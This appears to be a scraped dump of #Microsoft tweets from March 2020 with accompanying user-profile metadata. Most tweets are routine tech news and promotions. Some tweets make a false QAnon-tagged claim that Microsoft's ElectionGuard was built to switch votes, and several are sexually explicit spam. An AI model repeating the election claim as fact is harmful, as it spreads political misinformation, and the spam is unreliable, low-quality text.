    <t>{'id': 934893415640297472, 'id_str': '934893415640297472', 'name': 'Tech IRL', 'screen_name': 'TechInRL', 'location': 'Canada', 'description': 'Follow Us &amp; Subscribe to our Youtube Channel for Tech Videos including Tech How Toâ€™s with New Youtube Videos Every Week!', 'url': 'https://t.co/OEeILgsbWb', 'entities': {'url': {'urls': [{'url': 'https://t.co/OEeILgsbWb', 'expanded_url': 'https://www.youtube.com/c/TechIRL00', 'display_url': 'youtube.com/c/TechIRL00', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1441, 'friends_count': 1448, 'listed_count': 6, 'created_at': 'Sun Nov 26 21:15:34 +0000 2017', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9500, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/934894455320068096/oeC5gY5x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/934894455320068096/oeC5gY5x_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/934893415640297472/1511734268',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</si>
  <si>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03:50:40 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft may cancel Build 2020 conference as Seattle-area confirms first U.S. death from Coronavirus https://t.co/ZiJB9jfBjk</t>
  </si>
  <si>
    <t>Wed Mar 04 03:41:16 +0000 2020</t>
  </si>
  <si>
    <t>If Trump wants to win, he needs to do something about election guard, made by Microsoft and pentagon to change votes from rep to demonrat votes. #qanon #MAGA #8kun #voterID #voterfraud #electionfraud #electionguard #microsoft #electronicPrison #Democrats #bigtech</t>
  </si>
  <si>
    <t>{'id': 2241288482, 'id_str': '2241288482', 'name': 'SuicideSeattle', 'screen_name': 'SuicideSeattle', 'location': 'Seattle', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2628, 'friends_count': 674, 'listed_count': 4, 'created_at': 'Wed Dec 11 19:56:10 +0000 2013', 'favourites_count': 35476, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 36348,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'http://pbs.twimg.com/profile_images/841855895319400448/JhpChAIx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/841855895319400448/JhpChAIx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2241288482/1489549415',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</si>
  <si>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03:41:07 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Election Guard, Diebold The Real Election Meddling and Voter Fraud https://t.co/NzIU8kbOvN via @YouTube #qanon #8kun #MAGA #tyranny #Democrats #voterfraud #voterID #electionguard #microsoft #ElectionFraud</t>
  </si>
  <si>
    <t>Wed Mar 04 03:38:11 +0000 2020</t>
  </si>
  <si>
    <t>There's a lot to unpack with #Microsoft Teams. We're sharing the 7 best parts of it. https://t.co/fX8DUUNVAW #digital</t>
  </si>
  <si>
    <t>Wed Mar 04 03:37:33 +0000 2020</t>
  </si>
  <si>
    <t>Qualcomm to build #Azure Sphere chips with #Cellular connectivity
 #security #Microsoft
https://t.co/qFsw8BRjhv</t>
  </si>
  <si>
    <t>Wed Mar 04 03:36:09 +0000 2020</t>
  </si>
  <si>
    <t>'Halo: Combat Evolved' remaster is now available for PC https://t.co/Zf5UKOzE7i #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 03:34:03 +0000 2020</t>
  </si>
  <si>
    <t>Gears 5 Quick Clips 2 : quick slays with ze Torque Bow
#Gearsofwar #GearsofWar4  #Gears5 #Multiplayer #Versus #Competitive #online #videogame #game #gaming #Gamer #montage #clips #microsoft #Xbox #xboxone #shooter... https://t.co/dBW5hwu2R0</t>
  </si>
  <si>
    <t>{'id': 4352283553, 'id_str': '4352283553', 'name': 'Viewtiful_Jae', 'screen_name': 'Potty_Snatcher', 'location': 'VAâœˆï¸CAâœˆï¸NV', 'description': 'follow me on YouTube @ Potty Snatcher ( I take requests) , streamer, professional gamer,  personality', 'url': 'https://t.co/mb4duEYLmr', 'entities': {'url': {'urls': [{'url': 'https://t.co/mb4duEYLmr', 'expanded_url': 'https://www.youtube.com/channel/UCG0ymyRhSJjvGyI2BrPqjpQ', 'display_url': 'youtube.com/channel/UCG0ymâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 139, 'friends_count': 1860, 'listed_count': 2, 'created_at': 'Wed Nov 25 04:41:16 +0000 2015', 'favourites_count': 971, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6456,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'http://pbs.twimg.com/profile_images/1156555212963770370/eka2keXl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156555212963770370/eka2keXl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4352283553/1486021958',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</si>
  <si>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03:31:16 +0000 2020</t>
  </si>
  <si>
    <t>I like my boobs. I love to caress them. Do you want #South Bend   #microsoft #ebay https://t.co/ca9LcRTM25</t>
  </si>
  <si>
    <t>{'id': 1234872695378055169, 'id_str': '1234872695378055169', 'name': 'Carol Hevron', 'screen_name': 'tzinawinqui', 'location': 'Evansville, USA', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 33, 'listed_count': 0, 'created_at': 'Tue Mar 03 16:06:13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'http://pbs.twimg.com/profile_images/1234887476461932544/k6r9QyhB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234887476461932544/k6r9QyhB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234872695378055169/1583255131',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</si>
  <si>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03:28:19 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft are giving away #enterprise #conferencing tools due to coronavirus @DaveMichels  https://t.co/8JxlqSa1Hj #EC20</t>
  </si>
  <si>
    <t>{'id': 35203319, 'id_str': '35203319', 'name': 'Evan Kirstel', 'screen_name': 'evankirstel', 'location': 'Boston, MA', 'description': '#B2B #Analyst #Influencer helping #Enterprise #Tech clients w/ #SocialMedia #Marketing. See you at #EC20 #HIMSS20 #SXSW  #HPEdiscover! #Cloud #IoT #5G', 'url': 'https://t.co/qEToVUzSTc', 'entities': {'url': {'urls': [{'url': 'https://t.co/qEToVUzSTc', 'expanded_url': 'http://linkedin.com/in/evankirstel', 'display_url': 'linkedin.com/in/evankirstel', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 281348, 'friends_count': 265511, 'listed_count': 13810, 'created_at': 'Sat Apr 25 12:45:16 +0000 2009', 'favourites_count': 564635, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 901557,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'http://pbs.twimg.com/profile_images/1230662097534627840/dSu01e7x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230662097534627840/dSu01e7x_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/35203319/1583164034',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</si>
  <si>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03:26:23 +0000 2020</t>
  </si>
  <si>
    <t>February in HLS - Teams, Live Events, AI, Power BI, Data Protection and Clinical Industry Experts! - Microsoft Tech Community #microsoft #technology  https://t.co/emJr3P6Tqg</t>
  </si>
  <si>
    <t>Wed Mar 04 03:23:55 +0000 2020</t>
  </si>
  <si>
    <t>YOTNM Ep. 2: March is Colorectal Cancer Awareness month - Microsoft Tech Community #Microsoft #healthcare  https://t.co/1dKEeGKFJq</t>
  </si>
  <si>
    <t>Wed Mar 04 03:23:24 +0000 2020</t>
  </si>
  <si>
    <t>Its time for giants like #google #apple #microsoft #amazon etc. to pool in their resources and quickly stop the #coronavirus assault rather than worry about their product logistical issues. Help #mankind first and youll automatically reap rewards, unless ... conspiracy!?</t>
  </si>
  <si>
    <t>{'id': 138893640, 'id_str': '138893640', 'name': 'Viren Vora', 'screen_name': 'gooogled', 'location': '', 'description': '', 'url': 'https://t.co/vxfyKjbwhU', 'entities': {'url': {'urls': [{'url': 'https://t.co/vxfyKjbwhU', 'expanded_url': 'http://www.MyBloggersBlog.com', 'display_url': 'MyBloggersBlog.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 33, 'listed_count': 0, 'created_at': 'Fri Apr 30 23:13:35 +0000 2010', 'favourites_count': 398, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 776,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'http://pbs.twimg.com/profile_images/681678078293196801/mLg8RknB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/681678078293196801/mLg8RknB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/138893640/1568678042',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</si>
  <si>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Mar 04 03:20:29 +0000 2020</t>
  </si>
  <si>
    <t>Unfortunate #Amazon has an employee with #CoronaVirus.  
I expect to see similar emails from #Starbucks, #Microsoft, #Boeing and other companies in the next few days #seattlecoronavirus https://t.co/3bUWOaomZj</t>
  </si>
  <si>
    <t>{'id': 52188891, 'id_str': '52188891', 'name': 'mccshark', 'screen_name': 'mccshark', 'location': 'For sale by Google', 'description': 'American, tech censorship town crier, proponent of fiscally sound immigration policy, woke-socialist target.', 'url': 'https://t.co/kNGBu4uDWo', 'entities': {'url': {'urls': [{'url': 'https://t.co/kNGBu4uDWo', 'expanded_url': 'http://www.prageru.com', 'display_url': 'prageru.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 59, 'friends_count': 149, 'listed_count': 3, 'created_at': 'Mon Jun 29 21:05:05 +0000 2009', 'favourites_count': 3635, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 179,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'http://pbs.twimg.com/profile_images/767219449032085504/iiYuv4Vj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/767219449032085504/iiYuv4Vj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/52188891/1565659974', 'profile_link_color': '0099B9', 'profile_sidebar_border_color': '5ED4DC', 'profile_sidebar_fill_color': '95E8EC', 'profile_text_color': '3C3940', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 03:19:13 +0000 2020</t>
  </si>
  <si>
    <t>Why Mom was right about Dynamics 365 Business Central
https://t.co/EJ8ara9ms9
#MSDyn365bc #ERP #mom #Microsoft Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 03:15:15 +0000 2020</t>
  </si>
  <si>
    <t>We train the Trainers at https://t.co/QLJXPGVqjv, the #1 Online Train the Trainer Certification Program  Visit us today to take your career over the bridge to a brighter future - https://t.co/cVkaPupiuO -Approved by #Microsoft https://t.co/A62ciURg5y</t>
  </si>
  <si>
    <t>Wed Mar 04 03:10:23 +0000 2020</t>
  </si>
  <si>
    <t>@dorionwilson5 @7eleven @LanaDelRey Bro can you push me, much love from India. #india #pubg #Microsoft #muchlovefromindia</t>
  </si>
  <si>
    <t>{'id': 934718418334269441, 'id_str': '934718418334269441', 'name': 'TerronCR', 'screen_name': 'Memed76_', 'location': 'Los Angeles, CA', 'description': '19 win player', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 32, 'friends_count': 206, 'listed_count': 0, 'created_at': 'Sun Nov 26 09:40:11 +0000 2017', 'favourites_count': 1977, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 508, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1226008064471355393/7NdphWJO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226008064471355393/7NdphWJO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/934718418334269441/1583144857',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</si>
  <si>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03:09:02 +0000 2020</t>
  </si>
  <si>
    <t>#Future is now! futureproofn #microsoft Follow us for latest Info 'Halo: Combat Evolved' remaster is now available for PC https://t.co/QCpQJZmBc7</t>
  </si>
  <si>
    <t>Wed Mar 04 03:08:57 +0000 2020</t>
  </si>
  <si>
    <t>Excellent! #Google and #Microsoft are giving away #enterprise conferencing tools due to #coronavirus https://t.co/VcHVcDdA8a via @Verge</t>
  </si>
  <si>
    <t>{'id': 350700798, 'id_str': '350700798', 'name': 'Daniel Akre', 'screen_name': 'danielakre', 'location': 'Reno, NV', 'description': 'Executive Leader, Entrepreneur, Author, Athlete, former US Swimmer, All~American Florida State, Head Honcho at UNIPartners, Inc', 'url': 'https://t.co/gxs3L7XXiA', 'entities': {'url': {'urls': [{'url': 'https://t.co/gxs3L7XXiA', 'expanded_url': 'http://www.unipartners.co', 'display_url': 'unipartners.co', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1788, 'friends_count': 3262, 'listed_count': 86, 'created_at': 'Mon Aug 08 05:29:45 +0000 2011', 'favourites_count': 1685, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4857, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C1D7EB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/945324560408199168/Z87SWtwd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/945324560408199168/Z87SWtwd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/350700798/1473693177',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</si>
  <si>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03:08:43 +0000 2020</t>
  </si>
  <si>
    <t>Feeling your sperm flowing down my legs is the finest reminder of this morning. #Santa Maria   #microsoft #mvsales https://t.co/67sTY9MMY2</t>
  </si>
  <si>
    <t>{'id': 1235019281039085568, 'id_str': '1235019281039085568', 'name': 'Amrita Shafer', 'screen_name': 'trucolcomfirs', 'location': 'Reno, USA', 'description': 'I will love you until the stars go out, and the tides no longer turn.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 25, 'listed_count': 0, 'created_at': 'Wed Mar 04 01:48:41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'http://pbs.twimg.com/profile_images/1235025270144454659/L2ERmJaC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235025270144454659/L2ERmJaC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235019281039085568/1583287971',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</si>
  <si>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03:03:16 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/n7rprOuxqj</t>
  </si>
  <si>
    <t>{'id': 83259963, 'id_str': '83259963', 'name': 'Mike', 'screen_name': 'IT9_MiKE', 'location': 'Bangkok', 'description': 'Head of Strategic Solutions - Lannacom | Microsoft Gold Partner | IT#9@KMITL &amp; MBA4+1#4 FAM@KMITL', 'url': 'https://t.co/AGhXtCysPD', 'entities': {'url': {'urls': [{'url': 'https://t.co/AGhXtCysPD', 'expanded_url': 'https://www.linkedin.com/in/thanachartv', 'display_url': 'linkedin.com/in/thanachartv', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1040, 'friends_count': 691, 'listed_count': 350, 'created_at': 'Sun Oct 18 00:51:57 +0000 2009', 'favourites_count': 57610, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 93073,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'http://pbs.twimg.com/profile_images/1205916755752701952/H3G87sav_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205916755752701952/H3G87sav_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/83259963/1538342501',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</si>
  <si>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Wed Mar 04 03:02:49 +0000 2020</t>
  </si>
  <si>
    <t>Students need healthy physical learning spaces in order to do their best work. How are you creating environments to help your students learn? Check out this infographic for more on how #Microsoft technology creates flexible learning spaces. https://t.co/sN568O3bJA</t>
  </si>
  <si>
    <t>{'id': 66630522, 'id_str': '66630522', 'name': 'Aprizon', 'screen_name': 'nozyra', 'location': 'Jakarta, Indonesia', 'description': '(MCT, ITIL, MCITP, MCTS, MCSE, MVP 2010 - 2014) IT Trainer &amp; Consultant, Specialist in Cloud Platform and Infrastructure', 'url': 'https://t.co/UJKkXZBrE8', 'entities': {'url': {'urls': [{'url': 'https://t.co/UJKkXZBrE8', 'expanded_url': 'https://www.linkedin.com/in/aprizon', 'display_url': 'linkedin.com/in/aprizon', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 460, 'friends_count': 488, 'listed_count': 13, 'created_at': 'Tue Aug 18 08:20:23 +0000 2009', 'favourites_count': 511, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1126,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'http://pbs.twimg.com/profile_images/958129633362198528/8arin9FZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/958129633362198528/8arin9FZ_normal.jpg',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</si>
  <si>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03:00:51 +0000 2020</t>
  </si>
  <si>
    <t>Avanade offers #Microsoft #Dynamics AX Development Services covering Mobile Apps, Integraions, ERP and CRM --&amp;gt; https://t.co/NCQlRxfeVW &amp;lt;-- March 03, 2020 at 10:00PM</t>
  </si>
  <si>
    <t>Wed Mar 04 02:58:35 +0000 2020</t>
  </si>
  <si>
    <t>Press Ctrl+Backspace with the cursor placed after a word to erase it all the a time. Easy and fast! 
#Microsoft #Office #MSWord #Softvire
https://t.co/AvNQob22Ur https://t.co/YOt90Tgjjy</t>
  </si>
  <si>
    <t>Wed Mar 04 02:56:59 +0000 2020</t>
  </si>
  <si>
    <t>A great opportunity for a software developer.
Remember #Microsoft sponsors worker visa (H1B, etc..) for those who qualify including those from #Africa.
https://t.co/1aUQFL61Xc</t>
  </si>
  <si>
    <t>{'id': 57463078, 'id_str': '57463078', 'name': 'Mekonnen Kassa', 'screen_name': 'raskassa', 'location': 'Seattle, WA', 'description': 'A community and political activist focusing on Africa. \nICT professional..', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2546, 'friends_count': 534, 'listed_count': 12, 'created_at': 'Thu Jul 16 22:13:12 +0000 2009', 'favourites_count': 3973, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5928,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'http://pbs.twimg.com/profile_images/1026280849803603969/74DIgrD6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1026280849803603969/74DIgrD6_normal.jpg',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</si>
  <si>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02:55:49 +0000 2020</t>
  </si>
  <si>
    <t>Innovating to drive the future of intelligent retail
#NRF 2020 #Microsoft
https://t.co/BUWhwmRbyQ</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:44 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will be carbon negative by 2030
#The Official Microsoft Blog #Microsoft
https://t.co/eZofW9TiOb</t>
  </si>
  <si>
    <t>Microsoft will be carbon negative by 2030
#Featured #Microsoft
https://t.co/eZofW9TiOb</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:41 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:40 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#IoT #Microsoft
https://t.co/6SJe2f3cA8</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:39 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:37 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:36 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:33 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:31 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:30 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:29 +0000 2020</t>
  </si>
  <si>
    <t>U.S. Air Force and Microsoft partner to empower airmen with modern IT
#U.S. Air Force #Microsoft
https://t.co/hFpf45rJPs</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:28 +0000 2020</t>
  </si>
  <si>
    <t>U.S. Air Force and Microsoft partner to empower airmen with modern IT
#Microsoft 365 Government #Microsoft
https://t.co/hFpf45rJPs</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:27 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:26 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:24 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft for Startups unlocks $1 billion in sales opportunities for B2B startups; adds GitHub and Microsoft Power Platform
#Microsoft for Startups #Microsoft
https://t.co/bVnRQcQcvV</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:23 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft for Startups unlocks $1 billion in sales opportunities for B2B startups; adds GitHub and Microsoft Power Platform
#Featured #Microsoft
https://t.co/bVnRQcQcvV</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:22 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:21 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:20 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:19 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:18 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:17 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:16 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:15 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:55:14 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:53:59 +0000 2020</t>
  </si>
  <si>
    <t>Spent much of my evening testing a #powerautomate flow for updating a sharepoint line item based on a specific Microsoft Forms field entry. It finally works! #microsoft #flow https://t.co/5VISJbdhtd</t>
  </si>
  <si>
    <t>{'id': 2358292310, 'id_str': '2358292310', 'name': 'Mark', 'screen_name': 'markyeg', 'location': 'Edmonton, Alberta', 'description': '30-something man who works in the IT sector. Lover of sarcasm and satire. ðŸ‡¨ðŸ‡¦ ðŸŒˆ Trying not to take life too seriously!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1964, 'friends_count': 1273, 'listed_count': 69, 'created_at': 'Sun Feb 23 17:42:13 +0000 2014', 'favourites_count': 46065, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 90774,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'http://pbs.twimg.com/profile_images/1212453778751803392/eg4ubZaV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212453778751803392/eg4ubZaV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2358292310/1583083198', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 02:51:06 +0000 2020</t>
  </si>
  <si>
    <t>#Coronavirus jolts #tech firms: #Facebook cancels F8 conference; #Microsoft, #Apple warn investors https://t.co/ffsmQYDxXW</t>
  </si>
  <si>
    <t>{'id': 92690752, 'id_str': '92690752', 'name': 'Pratik Mistry', 'screen_name': 'PratikJMistry', 'location': 'Ahmedabad,', 'description': '#ITConsultant, #Dotnet developer, #DigitalTransformation enthusiast', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 122, 'friends_count': 29, 'listed_count': 42, 'created_at': 'Thu Nov 26 05:21:45 +0000 2009', 'favourites_count': 682, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 320,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'http://pbs.twimg.com/profile_images/882882427579899904/njSHh803_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/882882427579899904/njSHh803_normal.jpg',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</si>
  <si>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02:48:01 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 02:45:00 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - Deep Learning: Recurrent Neural Networks in Python #udemycoupon -&amp;gt; https://t.co/MQ0YdHiTsl
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Wed Mar 04 02:42:02 +0000 2020</t>
  </si>
  <si>
    <t>@jedayres and IGEL Technology know how to bring the best of the best in EUC together! #disrupteuc #euc #wvd #vdi #cloudjumper #igel #microsoft #azure #partners #anf https://t.co/EZRWm7AL6Q</t>
  </si>
  <si>
    <t>{'id': 39171708, 'id_str': '39171708', 'name': 'Paul Finn', 'screen_name': 'FinnV', 'location': 'NKY', 'description': 'IT Sales Specializing in Virtualization and End Point Management.', 'url': 'https://t.co/NSzb8xM4S5', 'entities': {'url': {'urls': [{'url': 'https://t.co/NSzb8xM4S5', 'expanded_url': 'http://www.cloudjumper.com', 'display_url': 'cloudjumper.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 303, 'friends_count': 778, 'listed_count': 19, 'created_at': 'Mon May 11 02:31:34 +0000 2009', 'favourites_count': 1782, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4227,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'http://pbs.twimg.com/profile_images/1129063856842727432/OACfLX50_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1129063856842727432/OACfLX50_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39171708/1567619358',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</si>
  <si>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Mar 04 02:38:16 +0000 2020</t>
  </si>
  <si>
    <t>Do you have gentle fingers? My pussy asks for affection #McKinney   #makeup #microsoft https://t.co/aueXMy0BAX</t>
  </si>
  <si>
    <t>{'id': 1234846136130822145, 'id_str': '1234846136130822145', 'name': 'Christy Lewis', 'screen_name': 'veycullepos', 'location': 'Jackson, USA', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 30, 'listed_count': 0, 'created_at': 'Tue Mar 03 14:20:41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'http://pbs.twimg.com/profile_images/1234900265137995782/v0xT1COh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234900265137995782/v0xT1COh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234846136130822145/1583258239',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</si>
  <si>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02:38:11 +0000 2020</t>
  </si>
  <si>
    <t>Great audience for the #Data modernization workshop - We spoke at elaborate lengths on Azure migrations and did some quick #architecture and design sessions at #Microsoft Bellevue campus.
Write to us for joining the "Ask me a question" sessions we do it...https://t.co/3GoO8vlrtK</t>
  </si>
  <si>
    <t>{'id': 365937117, 'id_str': '365937117', 'name': 'Pushkar Saraf', 'screen_name': 'pushsos', 'location': 'New York, USA', 'description': 'Finance runs in the blood, Understands gems, Techie by profession-Cloud Guy, Adventurer at core.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 395, 'friends_count': 422, 'listed_count': 54, 'created_at': 'Thu Sep 01 08:34:49 +0000 2011', 'favourites_count': 570, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2467,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'http://pbs.twimg.com/profile_images/1158788360086814720/8JLH921o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158788360086814720/8JLH921o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/365937117/1566265957', 'profile_link_color': 'FA743E',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</si>
  <si>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Wed Mar 04 02:35:10 +0000 2020</t>
  </si>
  <si>
    <t>Belgrade Nikola Tesla Airport serves over 5 million passengers per year. To help cut costs and pass the savings onto passengers, they're using the cloud to back up their data. #Microsoft https://t.co/vFbtq2ZEOx</t>
  </si>
  <si>
    <t>{'id': 1071617652412612608, 'id_str': '1071617652412612608', 'name': 'techcgroupllc', 'screen_name': 'techcgroupllc', 'location': 'Memphis, TN', 'description': 'Technology Consulting Group is a consulting company that specializes in the area of information security and Microsoft Azure Cloud based Platform.', 'url': 'https://t.co/4RXOHtolAA', 'entities': {'url': {'urls': [{'url': 'https://t.co/4RXOHtolAA', 'expanded_url': 'https://techcgroup.com', 'display_url': 'techcgroup.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 11, 'listed_count': 1, 'created_at': 'Sun Dec 09 04:08:52 +0000 2018', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 123, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1156946752248958976/JGXypgiP_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156946752248958976/JGXypgiP_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1071617652412612608/1544329500',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</si>
  <si>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02:35:00 +0000 2020</t>
